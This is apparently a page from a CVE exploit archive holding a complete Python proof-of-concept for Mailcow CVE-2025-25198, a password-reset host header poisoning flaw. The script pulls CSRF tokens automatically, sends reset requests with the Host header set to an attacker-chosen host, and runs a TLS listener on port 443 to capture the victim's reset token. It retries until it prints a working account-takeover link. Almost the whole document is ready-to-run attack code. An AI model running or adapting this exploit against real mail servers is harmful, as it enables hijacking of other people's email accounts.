5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / cve_2025_25198.py PY
from __future__ import annotations

import argparse
import os
import re
import ssl
import subprocess
import sys
import threading
from datetime import datetime, timezone
from http import HTTPStatus
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlparse

try:
    import requests
except Exception:
    requests = None

RESET = "\033[0m"
BOLD = "\033[1m"
DIM = "\033[2m"
GREEN = "\033[32m"
CYAN = "\033[36m"
YELLOW = "\033[33m"
MAGENTA = "\033[35m"

LISTEN_PORT = 443
CERT_FILE = "server.pem"
KEY_FILE = "server.key"
WAIT_INTERVAL = 8.0
USER_AGENT = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"

ANSI_RE = re.compile(r"\x1b\[[0-9;]*m")


def visible_len(s: str) -> int:
    return len(ANSI_RE.sub("", s))


class Console:
    def __init__(self, only_final: bool = False) -> None:
        self.only_final = only_final

    def log(self, msg: str) -> None:
        if self.only_final:
            return
        ts = datetime.now(timezone.utc).isoformat(timespec="seconds").replace("+00:00", "Z")
        print(f"{DIM}[{ts}]{RESET} {msg}", flush=True)

    def banner(self, link: str, source: str = "response") -> None:
        host = urlparse(link).hostname or ""
        title = f"  {BOLD}{GREEN}RESET LINK FOUND!{RESET}  {DIM}({source}){RESET}"
        link_line = f"  {CYAN}{link}{RESET}"
        target_line = f"  Target: {BOLD}{host}{RESET}" if host else ""
        max_content = max(
            visible_len(title),
            visible_len(link_line),
            visible_len(target_line) if host else 0
        )
        inner_width = max(80, min(150, max_content))
        line = "═" * inner_width

        def box_line(content: str) -> str:
            pad = inner_width - visible_len(content)
            if pad < 0:
                pad = 0
            return f"{MAGENTA}║{RESET}{content}{' ' * pad}{MAGENTA}║{RESET}"

        print("")
        print(f"{MAGENTA}╔{line}╗{RESET}")
        print(box_line(title))
        print(f"{MAGENTA}╟{line}╢{RESET}")
        print(box_line(link_line))
        if host:
            print(box_line(target_line))
        print(f"{MAGENTA}╚{line}╝{RESET}")
        print("")

console = Console(False)

RGX_TOKEN_IN_URL = re.compile(r'reset-password\?token=([^\s"&\'<>]+)', re.I)
RGX_TOKEN_FALLBACK = re.compile(r'\b([a-f0-9]{4,12}(?:-[a-f0-9]{4,12}){3,6})\b', re.I)


def response_text(response: object) -> str:
    text = getattr(response, "text", None)
    if isinstance(text, str):
        return text
    content = getattr(response, "content", b"")
    return content.decode("utf-8", "ignore")


def response_headers(response: object) -> Dict[str, str]:
    return dict(getattr(response, "headers", {}))


def links_from_text(html: str, base_url: str) -> List[str]:
    if not html:
        return []
    out: List[str] = []
    for m in RGX_TOKEN_IN_URL.finditer(html):
        out.append(f"{base_url.rstrip('/')}/reset-password?token={m.group(1)}")
    for m in RGX_TOKEN_FALLBACK.finditer(html):
        cand = f"{base_url.rstrip('/')}/reset-password?token={m.group(1)}"
        if cand not in out:
            out.append(cand)
    return out


def links_from_headers(headers: Dict[str, str], base_url: str) -> List[str]:
    loc = headers.get("Location") or headers.get("location")
    return links_from_text(loc, base_url) if loc else []


class ListenerState:
    def __init__(self) -> None:
        self.event = threading.Event()
        self.last_link: Optional[str] = None


class LoggingHTTPSHandler(SimpleHTTPRequestHandler):
    server_version = "PoisonedHostTest/host-only"
    error_content_type = "text/plain"

    def log_message(self, *_: object) -> None:
        return

    def _record(self, code: int) -> None:
        token = parse_qs(urlparse(self.path).query).get("token") or []
        if token:
            link = f"{self.server.target_base_url.rstrip('/')}/reset-password?token={token[0]}"
            self.server.state.last_link = link
            self.server.state.event.set()
        if not console.only_final:
            console.log(
                f"{YELLOW}[HIT]{RESET} {self.command} {self.path} "
                f"← {self.client_address[0]} [{code}]"
            )

    def do_GET(self) -> None:
        if self.path.startswith("/favicon"):
            self.send_response(HTTPStatus.NO_CONTENT)
            self.end_headers()
            return

        self.send_response(HTTPStatus.OK)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.end_headers()
        token = parse_qs(urlparse(self.path).query).get("token", [""])[0]
        body = f"<!doctype html><meta charset=utf-8><title>OK</title><p>token: <b>{token}</b></p>"
        self.wfile.write(body.encode("utf-8"))
        self._record(HTTPStatus.OK)

    def do_POST(self) -> None:
        _ = self.rfile.read(int(self.headers.get("Content-Length", "0") or 0))
        self.send_response(HTTPStatus.NO_CONTENT)
        self.end_headers()
        self._record(HTTPStatus.NO_CONTENT)


def ensure_self_signed(cert_file: str, key_file: str, cn: str = "localhost", days: int = 365) -> None:
    if os.path.exists(cert_file) and os.path.exists(key_file):
        return
    console.log("[+] Generating self-signed certificate…")
    subprocess.run(
        [
            "openssl", "req", "-x509", "-newkey", "rsa:2048",
            "-keyout", key_file, "-out", cert_file, "-days", str(days),
            "-nodes", "-subj", f"/CN={cn}",
        ],
        check=True,
    )


def require_root_for_privileged_port(port: int) -> None:
    if port < 1024:
        if hasattr(os, "geteuid"):
            if os.geteuid() != 0:
                print("[-] Port 443 requires root. Re-run with sudo.", file=sys.stderr)
                sys.exit(2)


def start_https_listener(
    host: str,
    port: int,
    cert: str,
    key: str,
    base_url: str,
    state: ListenerState,
) -> ThreadingHTTPServer:
    ensure_self_signed(cert, key)
    httpd = ThreadingHTTPServer((host, port), LoggingHTTPSHandler)
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(certfile=cert, keyfile=key)
    httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
    httpd.target_base_url = base_url
    httpd.state = state
    threading.Thread(target=httpd.serve_forever, name="https-listener", daemon=True).start()
    console.log(f"[+] HTTPS listener on https://{host}:{port}")
    return httpd


def add_cookie_string_to_session(session, cookie_header: Optional[str], base_url: str) -> None:
    if not cookie_header:
        return

    host = urlparse(base_url).hostname
    for part in re.split(r';\s*|,\s*', cookie_header.strip()):
        if not part or "=" not in part:
            continue

        name, val = part.split("=", 1)
        try:
            session.cookies.set(name.strip(), val.strip(), domain=host)
        except Exception:
            pass


class HttpClient:
    def __init__(self, base_url: str, use_http2: bool, cookie_header: Optional[str]) -> None:
        self.base_url = base_url.rstrip("/")
        self.use_http2 = use_http2
        if use_http2:
            try:
                import httpx
            except Exception as e:
                raise RuntimeError("Install httpx for --http2:  pip install httpx") from e

            self.session = httpx.Client(http2=True, verify=False, timeout=20.0, follow_redirects=False)
        else:
            if requests is None:
                raise RuntimeError("Missing 'requests' for HTTP/1.1.")
            self.session = requests.Session()
        add_cookie_string_to_session(self.session, cookie_header, self.base_url)

    def get(self, url: str, headers: Dict[str, str], allow_redirects: bool):
        if self.use_http2:
            return self.session.get(url, headers=headers or {}, follow_redirects=allow_redirects)
        return self.session.get(url, headers=headers or {}, verify=False, timeout=20, allow_redirects=allow_redirects)

    def post(self, url: str, headers: Dict[str, str], data: Dict[str, str], allow_redirects: bool):
        if self.use_http2:
            return self.session.post(url, headers=headers or {}, data=data or {}, follow_redirects=allow_redirects)
        return self.session.post(url, headers=headers or {}, data=data or {}, verify=False, timeout=20, allow_redirects=allow_redirects)

RGX_INPUTS = [
    re.compile(r'name=["\']csrf_token["\']\s+value=["\']([0-9a-zA-Z_\-./+=:]+)["\']'),
    re.compile(r'name=["\']_csrf["\']\s+value=["\']([^"\']+)["\']'),
    re.compile(r'name=["\']csrf["\']\s+value=["\']([^"\']+)["\']'),
    re.compile(r'name=["\']csrf_token_reset["\']\s+value=["\']([^"\']+)["\']'),
]
RGX_META = re.compile(r'<meta\s+name=["\']csrf-token["\']\s+content=["\']([^"\']+)["\']', re.I)
RGX_JS = [
    re.compile(r'csrf_token\s*[:=]\s*["\']([^"\']+)["\']', re.I),
    re.compile(r'window\.\w*csrf\w*\s*=\s*["\']([^"\']+)["\']', re.I),
]
COOKIE_CSRF = ["csrf_token", "_csrf", "XSRF-TOKEN", "CSRF-TOKEN"]
HEX64 = re.compile(r'^[0-9a-f]{64}$', re.I)


def _csrf_candidates_html(html: str) -> List[str]:
    if not html:
        return []
    cands: List[str] = []
    for rgx in RGX_INPUTS:
        m = rgx.search(html)
        if m:
            cands.append(m.group(1))
    m = RGX_META.search(html)
    if m:
        cands.append(m.group(1))
    for rgx in RGX_JS:
        m = rgx.search(html)
        if m:
            cands.append(m.group(1))
    for m in re.finditer(r'csrf_token=([0-9a-zA-Z_\-./+=:]{16,})', html):
        cands.append(m.group(1))
    seen: set[str] = set()
    out: List[str] = []
    for v in cands:
        if v not in seen:
            seen.add(v)
            out.append(v)
    return out


def _csrf_from_set_cookie(headers: Dict[str, str]) -> Optional[str]:
    sc = headers.get("Set-Cookie") or headers.get("set-cookie")
    if not sc:
        return None
    for cookie in re.split(r',(?=\s*\w+=)', sc):
        for name in COOKIE_CSRF:
            m = re.search(rf'\b{name}=([^;,\s]+)', cookie, re.I)
            if m:
                return m.group(1)
    return None


def _best_csrf(candidates: List[str]) -> Optional[str]:
    if not candidates:
        return None
    for c in candidates:
        if HEX64.fullmatch(c):
            return c
    return candidates[0]


def nav_headers(base_url: str, attacker_host: str) -> Dict[str, str]:
    return {
        "User-Agent": USER_AGENT,
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1",
        "Te": "trailers",
        "Referer": base_url.rstrip("/") + "/",
        "Origin": base_url,
        "Host": attacker_host,
    }


def fetch_csrf_auto(client: HttpClient, base_url: str, attacker_host: str, username: str) -> str:
    paths = ["", "/", "/index.php", "/reset-password", "/login", "/auth", "/user/reset"]
    h1 = nav_headers(base_url, attacker_host)
    for p in paths:
        url = client.base_url + p
        try:
            r = client.get(url, headers=h1, allow_redirects=True)
            token = _csrf_from_set_cookie(response_headers(r)) or _best_csrf(
                _csrf_candidates_html(response_text(r))
            )
            if token:
                return token
        except Exception as e:
            console.log(f"[!] CSRF GET failed at {url}: {e}")

    h2 = dict(h1)
    h2.pop("Host", None)
    for p in paths:
        url = client.base_url + p
        try:
            r = client.get(url, headers=h2, allow_redirects=True)
            token = _csrf_from_set_cookie(response_headers(r)) or _best_csrf(
                _csrf_candidates_html(response_text(r))
            )
            if token:
                return token
        except Exception as e:
            console.log(f"[!] CSRF GET (no Host) failed at {url}: {e}")

    pre_headers = {
        "User-Agent": USER_AGENT,
        "Accept": h1["Accept"],
        "Accept-Language": h1["Accept-Language"],
        "Content-Type": "application/x-www-form-urlencoded",
        "Host": attacker_host,
        "Referer": base_url.rstrip("/") + "/",
        "Origin": base_url,
        "Upgrade-Insecure-Requests": "1",
    }
    try:
        r = client.post(
            client.base_url + "/reset-password",
            headers=pre_headers,
            data={"username": username, "pw_reset_request": "", "csrf_token": ""},
            allow_redirects=True,
        )
        token = _csrf_from_set_cookie(response_headers(r)) or _best_csrf(
            _csrf_candidates_html(response_text(r))
        )
        if token:
            return token
    except Exception as e:
        console.log(f"[!] Preflight POST for CSRF failed: {e}")
    raise RuntimeError("Unable to auto-extract csrf_token.")


def looks_like_csrf_error(body: str, status: int) -> bool:
    if status in (400, 403):
        return True
    text = (body or "").lower()
    return any(k in text for k in ("csrf", "invalid token", "expired token", "forgery", "bad token"))


def run_sequence(client: HttpClient, base_url: str, username: str, csrf: str,
                 attacker_host: str) -> Tuple[Optional[str], Dict[str, object], str]:
    headers = {
        "User-Agent": USER_AGENT,
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded",
        "Host": attacker_host,
        "Referer": base_url.rstrip('/') + "/",
        "Origin": base_url,
        "Upgrade-Insecure-Requests": "1",
    }
    r1 = client.get(base_url, headers=headers, allow_redirects=True)
    body1 = response_text(r1)
    reset_ep = base_url.rstrip("/") + "/reset-password"
    payload = {"username": username, "pw_reset_request": "", "csrf_token": csrf}
    r2 = client.post(reset_ep, headers=headers, data=payload, allow_redirects=False)
    body2 = response_text(r2)
    r3 = client.get(base_url.rstrip("/") + "/", headers=headers, allow_redirects=False)
    body3 = response_text(r3)
    found: List[str] = []
    found += links_from_headers(response_headers(r1), base_url)
    found += links_from_headers(response_headers(r2), base_url)
    found += links_from_headers(response_headers(r3), base_url)
    found += links_from_text(body1, base_url)
    found += links_from_text(body2, base_url)
    found += links_from_text(body3, base_url)
    seen: set[str] = set()
    clean = [l for l in found if not (l in seen or seen.add(l))]
    summary = {
        "get1": getattr(r1, "status_code", None),
        "post": getattr(r2, "status_code", None),
        "get2": getattr(r3, "status_code", None),
        "links_found": clean,
    }
    return (clean[0] if clean else None), summary, body2


def attempt_once(base_url: str, username: str, attacker_host: str,
                 use_http2: bool,
                 cookie_header: Optional[str],
                 csrf_override: Optional[str]) -> Tuple[Optional[str], Dict[str, object]]:
    client = HttpClient(base_url, use_http2, cookie_header)
    if csrf_override:
        csrf = csrf_override
        console.log(f"[+] Using provided CSRF: {csrf[:16]}…")
    else:
        csrf = fetch_csrf_auto(client, base_url, attacker_host, username)
        console.log(f"[+] Auto CSRF: {csrf[:16]}…")

    console.log("[>] Sending sequence with poisoned Host")
    link, summary, post_body = run_sequence(client, base_url, username, csrf, attacker_host)
    if not link:
        post_status = int(summary.get("post") or 0)
        if not csrf_override and looks_like_csrf_error(post_body, post_status):
            console.log("[!] CSRF invalid/expired. Rotating session and retrying once…")
            client = HttpClient(base_url, use_http2, None)
            csrf2 = fetch_csrf_auto(client, base_url, attacker_host, username)
            console.log(f"[+] Auto CSRF (retry): {csrf2[:16]}…")
            link, summary, _ = run_sequence(client, base_url, username, csrf2, attacker_host)
    return link, summary


def run_until_success(listen_host: str, base_url: str, username: str,
                      attacker_host: str, use_http2: bool,
                      interval: float, max_attempts: int,
                      cookie_header: Optional[str],
                      csrf_override: Optional[str]) -> Optional[str]:
    require_root_for_privileged_port(LISTEN_PORT)

    state = ListenerState()
    srv = start_https_listener(listen_host, LISTEN_PORT, CERT_FILE, KEY_FILE, base_url, state)
    try:
        attempt = 0
        while True:
            attempt += 1
            if max_attempts and attempt > max_attempts:
                console.log("[i] Reached --max-attempts without success.")
                return None

            try:
                link, _summary = attempt_once(
                    base_url,
                    username,
                    attacker_host,
                    use_http2,
                    cookie_header,
                    csrf_override,
                )
            except Exception as e:
                console.log(f"[!] Attempt #{attempt} error: {e}")
                link = None
            if link:
                console.banner(link, source="response")
                return link
            if state.event.wait(timeout=interval):
                link = state.last_link
                if link:
                    console.banner(link, source="listener")
                return link
            console.log(f"[i] Attempt #{attempt} yielded no link. Retrying in {int(interval)}s…")
    except KeyboardInterrupt:
        console.log("[+] Aborted by user.")
        return None
    finally:
        try:
            srv.shutdown()
        except Exception:
            pass


def main() -> None:
    p = argparse.ArgumentParser(
        description="Host header poisoning tester (Mailcow CVE-2025-25198) — HTTPS listener on port 443, auto-CSRF, retry, Host-only"
    )
    p.add_argument("--listen-host", required=True)
    p.add_argument("--base-url", required=True)
    p.add_argument("--username", required=True)
    p.add_argument("--attacker-host", required=True)
    p.add_argument("--http2", action="store_true", help="Use HTTP/2 (recommended)")
    p.add_argument("--interval", type=float, default=WAIT_INTERVAL, help="Seconds between attempts and click wait window")
    p.add_argument("--max-attempts", type=int, default=0, help="0=infinite; >0 limits attempts")
    p.add_argument("--cookie", default=None, help="(Optional) inject cookies, e.g., PHPSESSID=...")
    p.add_argument("--csrf", default=None, help="(Optional) provide csrf_token explicitly (auto if omitted)")
    p.add_argument("--only-final", action="store_true", help="Hide progress; print only the final link banner")

    args = p.parse_args()
    global console
    console = Console(only_final=args.only_final)
    if not args.http2 and requests is None:
        console.log("[!] Install 'requests' or use --http2 with 'httpx'.")
        sys.exit(2)
    if not args.http2:
        console.log("[i] Running over HTTP/1.1 (requests). For best parity, use --http2.")

    link = run_until_success(
        listen_host=args.listen_host,
        base_url=args.base_url,
        username=args.username,
        attacker_host=args.attacker_host,
        use_http2=args.http2,
        interval=args.interval,
        max_attempts=args.max_attempts,
        cookie_header=args.cookie,
        csrf_override=args.csrf,
    )
    if link:
        if not args.only_final:
            print(f"{BOLD}{GREEN}Success:{RESET} reset link obtained. Exiting.")
    else:
        if not args.only_final:
            print("[i] No success (attempts exhausted or aborted).")

if __name__ == "__main__":
    main()